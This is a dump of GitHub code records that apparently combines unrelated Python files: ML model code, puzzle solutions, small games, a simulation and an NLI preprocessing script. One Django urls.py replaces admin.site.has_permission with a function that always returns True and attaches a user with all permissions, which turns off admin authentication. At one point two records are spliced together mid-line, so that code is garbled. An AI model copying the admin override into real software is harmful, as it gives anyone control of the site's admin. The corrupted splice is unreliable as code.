\"\"\"\n return _gan(\"srgan_2x2\", 2, pretrained, progress)\n\n\ndef srgan(pretrained: bool = False, progress: bool = True) -> Generator:\n r\"\"\"GAN model architecture from the `\"One weird trick...\" ` paper.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _gan(\"srgan\", 4, pretrained, progress)\n\n\ndef srgan_8x8(pretrained: bool = False, progress: bool = True) -> Generator:\n r\"\"\"GAN model architecture from the `\"One weird trick...\" ` paper.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _gan(\"srgan_8x8\", 8, pretrained, progress)\n","repo_name":"anneouyang/noisy-superres","sub_path":"SRGAN-PyTorch/srgan_pytorch/models/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"74605329701","text":"\"\"\"AoC 2015.10 problem solver.\n\nTakes input from STDIN by default.\n\n(c) Alexander Kashev, 2017\n\"\"\"\nimport sys\n\n\ndef look_and_say(string):\n \"\"\"\n Expand a string of digits according to look-and-say process in the problem.\n\n Keyword arguments:\n string --- a string to be processed\n \"\"\"\n result = \"\"\n last = \"\"\n count = 0\n\n for digit in string:\n if digit != last:\n if(count):\n result += str(count) + last\n last = digit\n count = 1\n else:\n count += 1\n\n if(count):\n result += str(count) + last\n\n return result\n\n\ndef solver(file, progress=True):\n \"\"\"\n Take a file object with 
input and solve AoC 2015.10 problem on the input.\n\n Outputs progress to STDERR unless silenced.\n\n Keyword arguments:\n file --- a file object to read input from\n progress --- boolean, whether to output progress to STDERR\n \"\"\"\n seed = file.readline()\n result = seed\n\n for i in range(0, 50):\n result = look_and_say(result)\n if i == 39:\n result40 = result\n if progress:\n sys.stderr.write(\"\\rProcessed {}/{} steps..\".format(i + 1, 50))\n\n if progress:\n sys.stderr.write(\"\\n\")\n\n return (len(result40), len(result))\n\n\nif __name__ == \"__main__\":\n solution = solver(sys.stdin)\n\n print(\"Part A: Length after 40 steps is {}.\".format(solution[0]))\n print(\"Part B: Length after 50 steps is {}.\".format(solution[1]))\n","repo_name":"kav2k/AoC","sub_path":"2015/10/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19807562940","text":"import heapq\nclass Solution(object):\n\n def arr_max(self, arr):\n mi = float(\"inf\")\n min_ind = 0\n for i in range(len(arr)):\n if arr[i] < mi:\n mi = arr[i]\n min_ind = i\n return mi, min_ind\n\n def arr_min(self, arr):\n mi = float(\"inf\")\n min_ind = 0\n for i in range(len(arr)):\n if arr[i] < mi:\n mi = arr[i]\n min_ind = i\n return mi, min_ind\n\n def minAmp(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n #[0,1,1,4,6,6,6]\n if len(nums) < 4:\n return 0\n nums.sort()\n\n res_1 = min(nums[-1]-nums[3],nums[-4]-nums[0]);\n res_2 = min(nums[-2]-nums[2],nums[-3]-nums[1]);\n\n\n return min(res_1, res_2)\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n\n testcases = [[-1,3,-1,8,5,4], [10,10,3,4,10]]\n for i, test in enumerate(testcases):\n print(\"Testcase \" + str(i) + \" is: \" + str(sol.minAmp(test)))\n","repo_name":"JoshuaSamuelTheCoder/Quarantine","sub_path":"Min_Amplitude/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"38398255045","text":"x = 1\nwhile x <= 5:\n print(x * x)\n x = x + 1\n\n\n\nfor p in range(1,6):\n print(p * p)\n\n\nimport random\ngame_won = False\nran = random.randint(1,100)\n\nwhile not game_won:\n choose = int(raw_input(\"GIMME URE NUMBER FOOL!!!!! \"))\n if choose == ran:\n print (\"well done FOOL u actually know what a number is! \")\n game_won = True\n elif choose > ran:\n print (\"thats bigger than my number DUMB DUMB! \")\n elif choose < ran:\n print (\"thats less han my number you UTTER COMPLETE IDIOT!! 
\")\n \nprint (\"the end!\")\n\n \n\n \n \n\n","repo_name":"martinpeck/random-pi","sub_path":"matt/loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12677615690","text":"import io\nimport sys\n\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')\nsys.stdin = io.TextIOWrapper(sys.stdin.buffer,encoding='utf-8')\n\n\ndef num(s):\n l = ['零', '壹', '贰', '叁', '肆', '伍', '陆', '柒', '捌', '玖']\n l_3 = ['', '拾', '佰', '仟', '万', '拾', '佰', '仟', '亿', '拾', '佰', '仟', '万']\n s = list(map(int, list(s)))[::-1]\n l_2 = []\n\n for i in s:\n l_2.insert(0, l_3[0])\n l_2.insert(0, l[i])\n l_3.remove(l_3[0])\n return l_2\n\n\ndef zero(l):\n l_2 = ['拾', '佰', '仟', '万', '亿']\n l_3 = []\n for i in range(len(l)-1, 0, -1):\n if l[i] in l_2 and l[i-1] == '零' and l[i] != '亿':\n del l[i]\n\n w = ''\n for c in l:\n if c != '零':\n l_3.append(c)\n w = ''\n elif w != '零':\n l_3.append(c)\n w = c\n\n if l_3[-2] == '零':\n del l_3[-2]\n\n for i in range(len(l_3)):\n if l_3[i] == '亿' and l_3[i-1] == '零':\n del l_3[i-1]\n break\n\n return l_3\n\n\ndef run():\n s = input()\n if s == '0':\n print('零元整')\n else:\n print(''.join(zero(num(s))) + '元整')\n\n\nif __name__ == '__main__':\n run()\n\n","repo_name":"Jacken-Wu/CQU-python-2021","sub_path":"CQU-python-题库题参考答案/题库练习:字符串/编程题/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41690508499","text":"\"\"\"geodjango_test URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.views.generic import RedirectView\nclass AccessUser:\n    has_module_perms = has_perm = __getattr__ = lambda s,*a,**kw: True\n\nadmin.site.has_permission = lambda r: setattr(r, 'user', AccessUser()) or True\n\n\nurlpatterns = [\n    url(r'^admin/est/zona/$',RedirectView.as_view(url='/gps/adminzonas')),\n    url(r'^admin/est/planta/$',RedirectView.as_view(url='/gps/adminplantas')),\n    url(r'^admin/est/area/$',RedirectView.as_view(url='/gps/adminareas')),\n    url(r'^admin/est/reportes/$',RedirectView.as_view(url='/gps/reportes')),\n    url(r'^admin/', admin.site.urls),\n    url(r'^chaining/', include('smart_selects.urls')),\n    url(r'^gps/', include('gps.urls')),\n    url(r'^est/', include('est.urls')),\n    \n]\nurlpatterns += i18n_patterns(\n    url(r'^admin/', include(admin.site.urls)),\n)\n#Comentar las lineas de abajo en produccion\nurlpatterns = urlpatterns + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns = urlpatterns + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"dsanchezkc/modulo-gps","sub_path":"project/workspace/staff_est/geodjango_test/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4434296331","text":"# https://www.codewars.com/kata/584dee06fe9c9aef810001e8\r\n\r\ndef green(n):\r\n    if n==1:return n\r\n    a,b,m,p=5,6,3,10\r\n    while m= 0 and y >= 0:\n                pos = (x + 1, y)\n            if d == 'l' and x - 1 <= WIDTH - 1 and y <= HEIGHT - 1 and x - 1 >= 0 and y >= 0:\n                pos = (x - 1, y)\n            if d == 'u' and x <= WIDTH - 1 and y - 1 <= HEIGHT - 1 and x >= 0 and y - 1 >= 0:\n                pos = (x, y - 1)\n            if d == 'd' and x <= WIDTH - 1 and y + 1 <= HEIGHT - 1 and x >= 0 and y + 1 >= 0:\n                pos = (x, y + 1)\n\n            if pos not in self.walls:\n                self.player = pos\n                if (x, y) in self.goals:\n                    self.goals.remove((x, y))\n                    self.empty.append((x, y))\n                    self.score += 1\n\n    def move_ghosts(self):\n        for p, ghost in enumerate(self.ghosts):\n            x = ghost[0]\n            y = ghost[1]\n            pos = (x, y)\n            res = {}\n            for i in range(0, self.width):\n                for j in range(0, self.height):\n                    res[(i, j)] = []\n                    if (i + 1, j) not in self.walls and i + 1 < self.width:\n                        res[(i, j)].append((i + 1, j))\n                    if (i - 1, j) not in self.walls and i - 1 > -1:\n                        res[(i, j)].append((i - 1, j))\n                    if (i, j + 1) not in self.walls and j + 1 < self.height:\n                        res[(i, j)].append((i, j + 1))\n                    if (i, j - 1) not in self.walls and j - 1 > -1:\n                        res[(i, j)].append((i, j - 1))\n            graph = res\n            move = dijsktra(graph, pos, self.player)[1]\n            d = ''\n            if ghost[0] < move[0]:\n                d = 'r'\n            if ghost[0] > move[0]:\n                d = 'l'\n            if ghost[1] > move[1]:\n                d = 'u'\n            if ghost[1] < move[1]:\n                d = 'd'\n            if randint(0, 1) == 0:\n                d = d\n            else:\n                d = choice(['r', 'l', 'u', 'd'])\n            if d == 'r' and x + 1 <= WIDTH - 1 and y <= HEIGHT - 1 and x + 1 >= 0 and y >= 0:\n                pos = (x + 1, y)\n            if d == 'l' and x - 1 <= WIDTH - 1 and y <= HEIGHT - 1 and x - 1 >= 0 and y >= 0:\n                pos = (x - 1, y)\n            if d == 'u' and x <= WIDTH - 1 and y - 1 <= HEIGHT - 1 and x >= 0 and y - 1 >= 0:\n                pos = (x, y - 1)\n            if d == 'd' and x <= WIDTH - 1 and y + 1 <= HEIGHT - 1 and x >= 0 and y + 1 >= 0:\n                pos = (x, y + 1)\n\n            if pos not in self.walls:\n                self.ghosts[p] = pos\n\ndef draw_grid(g, 
width=2):\n for y in range(g.height):\n for x in range(g.width):\n if (x, y) in g.walls:\n symbol = '#'\n elif (x, y) == g.player:\n symbol = '$'\n elif (x, y) in g.ghosts:\n symbol = 'G'\n elif (x, y) in g.goals:\n symbol = '.'\n elif (x, y) in g.empty:\n symbol = ' '\n print(\"%%-%ds\" % width % symbol, end=\"\")\n print()\n\n\ndef clear():\n subprocess.Popen(\"cls\" if platform.system() == \"Windows\" else \"clear\", shell=True)\n time.sleep(.1)\n\n\ndef create_graph(g: MapGrid):\n res = {}\n dangerous = []\n for ghost in g.ghosts:\n dangerous.append(ghost)\n dangerous.append((ghost[0] - 1, ghost[1]))\n dangerous.append((ghost[0] + 1, ghost[1]))\n dangerous.append((ghost[0], ghost[1] - 1))\n dangerous.append((ghost[0], ghost[1] + 1))\n for i in range(0, g.width):\n for j in range(0, g.height):\n res[(i, j)] = []\n if (i + 1, j) not in g.walls and i + 1 < g.width and (i + 1, j) not in dangerous:#:\n res[(i, j)].append((i + 1, j))\n if (i - 1, j) not in g.walls and i - 1 > -1 and (i - 1, j) not in dangerous:#:\n res[(i, j)].append((i - 1, j))\n if (i, j + 1) not in g.walls and j + 1 < g.height and (i, j + 1) not in dangerous:#:\n res[(i, j)].append((i, j + 1))\n if (i, j - 1) not in g.walls and j - 1 > -1 and (i, j - 1) not in dangerous:#:\n res[(i, j)].append((i, j - 1))\n return res\n\n\ndef dijsktra(graph, initial, end):\n shortest_paths = {initial: (None, 0)}\n current_node = initial\n visited = set()\n iterations = 0\n while current_node != end:\n iterations += 1\n visited.add(current_node)\n destinations = graph[current_node]\n weight_to_current_node = shortest_paths[current_node][1]\n\n for next_node in destinations:\n iterations += 1\n weight = 1 + weight_to_current_node\n if next_node not in shortest_paths:\n shortest_paths[next_node] = (current_node, weight)\n else:\n current_shortest_weight = shortest_paths[next_node][1]\n if current_shortest_weight > weight:\n shortest_paths[next_node] = (current_node, weight)\n\n next_destinations = {node: shortest_paths[node] for node in shortest_paths if node not in visited}\n if not next_destinations:\n return \"Route Not Possible\"\n # next node is the destination with the lowest weight\n current_node = min(next_destinations, key=lambda k: next_destinations[k][1])\n\n # Work back through destinations in shortest path\n path = []\n while current_node is not None:\n iterations += 1\n path.append(current_node)\n next_node = shortest_paths[current_node][0]\n current_node = next_node\n # Reverse path\n path = path[::-1]\n return path\n\n\ndef main():\n g = MapGrid()\n clear()\n draw_grid(g)\n while g.goals:\n # print('g.goals: ', g.goals)\n graph = create_graph(g)\n # print('graph: ', graph)\n target = choice(g.goals)\n # print('target: ', target)\n path = dijsktra(graph, g.player, target)\n # print('path: ', path)\n if path == \"Route Not Possible\":\n # print('AAAA')\n g.move_ghosts()\n clear()\n draw_grid(g)\n continue\n path = path[1:]\n # input()\n while path:\n d = ''\n if g.player[0] < path[0][0]:\n d = 'r'\n if g.player[0] > path[0][0]:\n d = 'l'\n if g.player[1] > path[0][1]:\n d = 'u'\n if g.player[1] < path[0][1]:\n d = 'd'\n g.move_player(d)\n g.move_ghosts()\n print()\n path = path[1:]\n clear()\n draw_grid(g)\n if g.player in g.ghosts:\n print('You lose!')\n print(\"Score: \", g.score)\n return\n time.sleep(0.1)\n graph = create_graph(g)\n path = dijsktra(graph, g.player, target)\n # print('path: ', path)\n if path == \"Route Not Possible\":\n # print('BBBB')\n target = choice(g.goals)\n graph = create_graph(g)\n path = 
dijsktra(graph, g.player, target)\n while path == \"Route Not Possible\":\n g.move_ghosts()\n clear()\n draw_grid(g)\n if g.player in g.ghosts:\n print('You lose!')\n print(\"Score: \", g.score)\n return\n graph = create_graph(g)\n path = dijsktra(graph, g.player, target)\n continue\n path = path[1:]\n if target == g.player and len(g.goals) == 1:\n break\n if target == g.player and len(g.goals) == 1:\n break\n print(\"You won!\")\n print(\"Score: \", g.score)\n\nif __name__ == '__main__':\n main()","repo_name":"ysavonik/IS3","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22859900445","text":"import csv\nfrom models.players import Player\n\ndef index_players(db_connection, path_to_player_file): \n cur = db_connection.cursor()\n with open(path_to_player_file, 'r' ) as f:\n reader = csv.DictReader(f)\n for line in reader:\n player = Player(line)\n cur.execute(\n \"INSERT INTO players VALUES (%s, %s, %s)\",\n (player.id, \n player.first_name, \n player.last_name)\n ) \n db_connection.commit()","repo_name":"rkredux/mlbanalytics","sub_path":"player_indexer.py","file_name":"player_indexer.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10233016322","text":"import random\nfrom animals import FantomAnimal\nfrom animals import Plankton\nfrom animals import Killerwhale\nfrom animals import Shark\nfrom animals import Dolphin\nfrom living import Animals\nfrom living import AnimalsType\nimport string\n\n\nclass OceanController:\n def __init__(self, size: int):\n self.n: int = size\n\n def init(self, paramOcean: [[]], planktonNumber: int, dolphinNumber: int, sharkNumber: int, killerwhaleNumber: int) -> None:\n for i in range(0, self.n):\n for j in range(0, self.n):\n paramOcean[i][j] = FantomAnimal(i, j)\n\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n for i in range(0, planktonNumber + 1):\n while paramOcean[x][y].getType() != AnimalsType.EMPTY:\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n paramOcean[x][y] = Plankton(x, y, 2, 0)\n for i in range(0, dolphinNumber + 1):\n while paramOcean[x][y].getType() != AnimalsType.EMPTY:\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n paramOcean[x][y] = Dolphin(x, y, 4, True, 0)\n for i in range(0, sharkNumber + 1):\n while paramOcean[x][y].getType() != AnimalsType.EMPTY:\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n paramOcean[x][y] = Shark(x, y, 5, True, 0)\n for i in range(0, killerwhaleNumber + 1):\n while paramOcean[x][y].getType() != AnimalsType.EMPTY:\n x = random.randrange(1, self.n)\n y = random.randrange(1, self.n)\n paramOcean[x][y] = Killerwhale(x, y, 6, True, 0)\n\n def update(self, paramOcean: [[]]) -> None:\n for i in range(1, self.n - 1):\n for j in range(1, self.n - 1):\n tempOcean = paramOcean[i][j].next(paramOcean)\n if tempOcean:\n for h in tempOcean:\n paramOcean[h.getX()][h.getY()] = h\n\n def deleteOcean(self, paramOcean: []) -> None:\n for i in range(1, self.n - 1):\n for j in range(1, self.n - 1):\n paramOcean[i][j] = None\n\n def showOcean(self, paramOcean: []) -> None:\n for i in range(1, self.n - 1):\n for j in range(1, self.n - 1):\n if paramOcean[i][j].getType() == AnimalsType.EMPTY:\n print(\"E\", end=\" \")\n if paramOcean[i][j].getType() == AnimalsType.PLANKTON:\n print(\"P\", end=\" \")\n if 
paramOcean[i][j].getType() == AnimalsType.DOLPHIN:\n print(\"D\", end=\" \")\n if paramOcean[i][j].getType() == AnimalsType.SHARK:\n print(\"S\", end=\" \")\n if paramOcean[i][j].getType() == AnimalsType.KILLERWHALE:\n print(\"K\", end=\" \")\n print()\n\n def getSizeOfTheOcean(self) -> int:\n return self.n\n\n def setSizeOfTheOcean(self, size: int) -> None:\n self.n = size\n\n def addAnimal(self, ocean: [[]]) -> None:\n print(\"p - plankton\")\n print(\"d - dolphin\")\n print(\"s - shark\")\n print(\"k - killerwhale\")\n choice = str(input())\n males = [\"male\", \"female\"]\n if choice == \"p\":\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n hp = int(input(\"input hp \"))\n while hp < 1 or hp > 2:\n hp = int(input(\"try more \"))\n age = int(input(\"input age \"))\n while age < 1 or age > 2:\n age = int(input(\"try more \"))\n ocean[x][y] = Plankton(x, y, hp, age)\n return\n if choice == \"d\":\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n hp = int(input(\"input hp \"))\n while hp < 1 or hp > 4:\n hp = int(input(\"try more \"))\n male = str(input(\"input male \"))\n while not male in males:\n male = str(input(\"try more \"))\n age = int(input(\"input age \"))\n while age < 1 or age > 4:\n age = int(input(\"try more \"))\n ocean[x][y] = Dolphin(x, y, hp, male, age)\n return\n if choice == \"s\":\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n hp = int(input(\"input hp \"))\n while hp < 1 or hp > 5:\n hp = int(input(\"try more \"))\n male = str(input(\"input male \"))\n while not male in males:\n male = str(input(\"try more \"))\n age = int(input(\"input age \"))\n while age < 1 or age > 5:\n age = int(input(\"try more \"))\n ocean[x][y] = Shark(x, y, hp, male, age)\n\n return\n if choice == \"k\":\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n hp = int(input(\"input hp \"))\n while hp < 1 or hp > 6:\n hp = int(input(\"try more \"))\n male = str(input(\"input male \"))\n while not male in males:\n male = str(input(\"try more \"))\n age = int(input(\"input age \"))\n while age < 1 or age > 6:\n age = int(input(\"try more \"))\n ocean[x][y] = Killerwhale(x, y, hp, male, age)\n return\n print(\"invalid letter\")\n def killAnimal(self, ocean:[]) -> None:\n x = int(input(\"input x \"))\n while x < 1 or x > self.n - 2:\n x = int(input(\"try more \"))\n y = int(input(\"input y \"))\n while y < 1 or y > self.n - 2:\n y = int(input(\"try more \"))\n ocean[x][y] = FantomAnimal(x, y)\n","repo_name":"Faceless1337/Ocean","sub_path":"oceanController.py","file_name":"oceanController.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41303877459","text":"\nnum=[5, 2, 6, 3, 4]\n\nlen= len(num)\n\nfor i in range(len-1):\n min=i\n for j in range(i+1,len):\n if num[j] < num[min] :\n min = j\n if min != i:\n temp=num[i]\n num[i]=num[min]\n 
num[min]=temp;\nprint(num)\n\n\n\n","repo_name":"MasudurRahman34/problem-solving","sub_path":"dsa/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72712344742","text":"import os\nimport matplotlib.pyplot as plt\noutput_path = './experiments'\nimport torch\nimport numpy as np\n\ndef read(dir):\n topk=[]\n file_path = os.path.join(output_path,dir)\n with open(file_path,'r') as f:\n for line in f.readlines():\n topk.append(float(line.split('\\n')[0]))\n return topk\n\nif __name__ == '__main__':\n # max = 'result_max.txt'\n # mean = 'result_mean.txt'\n # topk = 'result_topkmean.txt'\n #\n # max_data = read(max)\n # mean_data = read(mean)\n # topk_data = read(topk)\n # topk_data = topk_data[:-1]\n #\n # i = range(800)\n # plt.figure()\n # plt.plot(i,max_data,'r',i,mean_data,'y',i,topk_data,'b')\n # plt.show()\n # a = torch.arange(0,12).view(3,4)\n # print(a)\n #\n # index = torch.nonzero(a)\n #\n # index = index.transpose(-1,-2)\n # c = torch.Tensor([0.3,0.5,0.8])\n # print((c>0.3).type_as(a))\n # d = torch.Tensor([0.1,0.8,0.1])\n # print(torch.where(c>0.3,1.0,0.2))\n # print(torch.mean(c))\n d = torch.rand(2,3,3)\n d_norm = torch.norm(d,p=2, dim =-1,keepdim=True)\n d_n = torch.div(d,d_norm)\n # print(torch.matmul(d_n,d_n.transpose(-1,-2)))\n import torch.nn as nn\n projection = nn.Linear(3,1)\n c = torch.arange(0,12).view(3,4)\n c = torch.unsqueeze(c,0)\n c = c.repeat(2,1,1)\n print(c)\n\n c_max, c_id = torch.max(c,-1)\n d = c.sum(-2)\n e = torch.arange(0,c_max.size(0)).view(-1,1).repeat(1,c_max.size(1))\n print(d[e,c_id]+c_max)\n #print(c_id)\n","repo_name":"hhhhhpy/bgf-generation","sub_path":"exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11077880759","text":"\"\"\"\nPreprocess some NLI dataset and word embeddings to be used by the ESIM model.\n\"\"\"\n# Aurelien Coet, 2018.\n\nimport os\nimport pickle\nimport string\nimport fnmatch\nimport json\nimport ipdb\nimport numpy as np\nfrom collections import Counter\n\n\ndef read_data(filepath, lowercase=False, ignore_punctuation=False):\n \"\"\"\n Read the premises, hypotheses and labels from a file in some NLI\n dataset and return them in a dictionary.\n\n Args:\n filepath: The path to a file containing some premises, hypotheses\n and labels that must be read. 
The file should be formatted in\n the same way as the SNLI (or MultiNLI) dataset.\n lowercase: Boolean value indicating whether the words in the premises\n and hypotheses must be lowercased.\n ignore_punctuation: Boolean value indicating whether to ignore\n punctuation in the premises and hypotheses.\n\n Returns:\n A dictionary containing three lists, one for the premises, one for the\n hypotheses, and one for the labels in the input data.\n \"\"\"\n with open(filepath, 'r') as input_data:\n premises, hypotheses, labels = [], [], []\n\n # Translation tables to remove parentheses and punctuation from\n # strings.\n parentheses_table = str.maketrans({'(': None, ')': None})\n punct_table = str.maketrans({key: ' ' for key in string.punctuation})\n\n # Ignore the headers on the first line of the file.\n next(input_data)\n\n for line in input_data:\n line = line.strip().split('\\t')\n\n # Ignore sentences that have no gold label.\n if line[0] == '-':\n continue\n\n premise = line[1]\n hypothesis = line[2]\n\n # Remove '(' and ')' from the premises and hypotheses.\n premise = premise.translate(parentheses_table)\n hypothesis = hypothesis.translate(parentheses_table)\n\n if lowercase:\n premise = premise.lower()\n hypothesis = hypothesis.lower()\n\n if ignore_punctuation:\n premise = premise.translate(punct_table)\n hypothesis = hypothesis.translate(punct_table)\n\n # Each premise and hypothesis is split into a list of words.\n premises.append(premise.rstrip().split())\n hypotheses.append(hypothesis.rstrip().split())\n labels.append(line[0])\n\n return {\"premises\": premises,\n \"hypotheses\": hypotheses,\n \"labels\": labels}\n\n\ndef read_data_sogou(filepath, **kwargs):\n premises, hypotheses, labels = [], [], []\n with open(filepath) as fin:\n for line in fin:\n data = json.loads(line)\n premises.append(data['passage'])\n hypotheses.append(data['question'])\n labels.append(data['label'])\n return {\"premises\": premises,\n \"hypotheses\": hypotheses,\n \"labels\": labels}\n\n\ndef build_worddict(data, num_words=None):\n \"\"\"\n Build a dictionary associating words from a set of premises and\n hypotheses to unique integer indices.\n Update: we put the most common word in hypotheses\n\n Args:\n data: A dictionary containing the premises and hypotheses for which\n a worddict must be built. The dictionary is assumed to have the\n same form as the dicts built by the 'read_data' function of this\n module.\n num_words: Integer indicating the maximum number of words to\n keep in the worddict. If specified, only the 'num_words' most\n frequent words will be kept. If set to None, all words are\n kept. 
Defaults to None.\n\n    Returns:\n        A dictionary associating words to integer indices.\n    \"\"\"\n    words = []\n    [words.extend(sentence) for sentence in data['hypotheses']]\n    counts = Counter(words)\n    if num_words is None:\n        num_words = len(counts)\n\n    worddict = {word[0]: i+4\n                for i, word in enumerate(counts.most_common(num_words))}\n\n    worddict[\"_PAD_\"] = 0\n    worddict[\"_OOV_\"] = 1\n    worddict[\"_BOS_\"] = 2\n    worddict[\"_EOS_\"] = 3\n    #open('tmp_question_word.pkl', 'w').write(json.dumps(worddict))\n\n    # Special indices are used for padding, out-of-vocabulary words, and\n    # beginning and end of sentence tokens.\n    [words.extend(sentence) for sentence in data['premises']]\n    counts = Counter(words)\n    num_words = len(counts)\n    for word, v in counts.most_common(num_words):\n        if word not in worddict:\n            worddict[word] = len(worddict)\n\n    return worddict\n\n\ndef words_to_indices(sentence, worddict):\n    \"\"\"\n    Transform the words in a sentence to integer indices.\n\n    Args:\n        sentence: A list of words that must be transformed to indices.\n        worddict: A dictionary associating words to indices.\n\n    Returns:\n        A list of indices.\n    \"\"\"\n    # Include the beginning of sentence token at the start of the sentence.\n    indices = [worddict[\"_BOS_\"]]\n    for word in sentence:\n        if word in worddict:\n            index = worddict[word]\n        else:\n            # Words absent from 'worddict' are treated as a special\n            # out-of-vocabulary word (OOV).\n            index = worddict['_OOV_']\n        indices.append(index)\n    # Add the end of sentence token at the end of the sentence.\n    indices.append(worddict[\"_EOS_\"])\n\n    return indices\n\n\ndef transform_to_indices(data, worddict, labeldict):\n    \"\"\"\n    Transform the words in the premises and hypotheses of a dataset, as well\n    as their associated labels, to integer indices.\n\n    Args:\n        data: A dictionary containing lists of premises, hypotheses\n            and labels.\n        worddict: A dictionary associating words to unique integer indices.\n        labeldict: A dictionary associating labels to unique integer indices.\n\n    Returns:\n        A dictionary containing the transformed premises, hypotheses and\n        labels.\n    \"\"\"\n    transformed_data = {\"premises\": [], \"hypotheses\": [], \"labels\": []}\n\n    for i, premise in enumerate(data['premises']):\n        # Ignore sentences that have a label for which no index was\n        # defined in 'labeldict'.\n        label = data[\"labels\"][i]\n        if label not in labeldict:\n            print('error label')\n            continue\n\n        transformed_data[\"labels\"].append(labeldict[label])\n\n        indices = words_to_indices(premise, worddict)\n        transformed_data[\"premises\"].append(indices)\n\n        indices = words_to_indices(data[\"hypotheses\"][i], worddict)\n        transformed_data[\"hypotheses\"].append(indices)\n\n    return transformed_data\n\n\ndef build_embedding_matrix(worddict, embeddings_file):\n    \"\"\"\n    Build an embedding matrix with pretrained weights for a given worddict.\n\n    Args:\n        worddict: A dictionary associating words to unique integer indices.\n        embeddings_file: A file containing pretrained word embeddings.\n\n    Returns:\n        A numpy matrix of size (num_words+4, embedding_dim) containing\n        pretrained word embeddings (the +4 is for the padding, BOS, EOS and\n        out-of-vocabulary tokens).\n    \"\"\"\n    # Load the word embeddings in a dictionary.\n    embeddings = {}\n    seen_word = 0\n    with open(embeddings_file, 'r', errors=\"ignore\") as input_data:\n        for line in input_data:\n            line = line.rstrip().split(' ')\n\n            try:\n                # Check that the second element on the line is the start\n                # of the embedding and not another word. 
Necessary to\n                # ignore multiple word lines.\n                float(line[1])\n                word = line[0]\n                if word in worddict:\n                    embeddings[word] = line[1:]\n\n            # Ignore lines corresponding to multiple words separated\n            # by spaces.\n            except ValueError:\n                print('error')\n                continue\n\n    num_words = len(worddict)\n    embedding_dim = len(list(embeddings.values())[0])\n    embedding_matrix = np.zeros((num_words, embedding_dim))\n    print('num_words: %s, emb_dim: %s' % (num_words, embedding_dim))\n    # Actual building of the embedding matrix.\n    for word, i in worddict.items():\n        if word in embeddings:\n            seen_word += 1\n            embedding_matrix[i] = np.array(embeddings[word], dtype=float)\n        else:\n            if word == \"_PAD_\":\n                continue\n            # Out of vocabulary words are initialised with random gaussian\n            # samples.\n            embedding_matrix[i] = np.random.normal(size=(embedding_dim))\n    print('share words: %s' % seen_word)\n    return embedding_matrix\n\n\ndef preprocess_NLI_data(inputdir,\n                        embeddings_file,\n                        targetdir,\n                        lowercase=False,\n                        ignore_punctuation=False,\n                        num_words=None,\n                        datatype='NLI'):\n    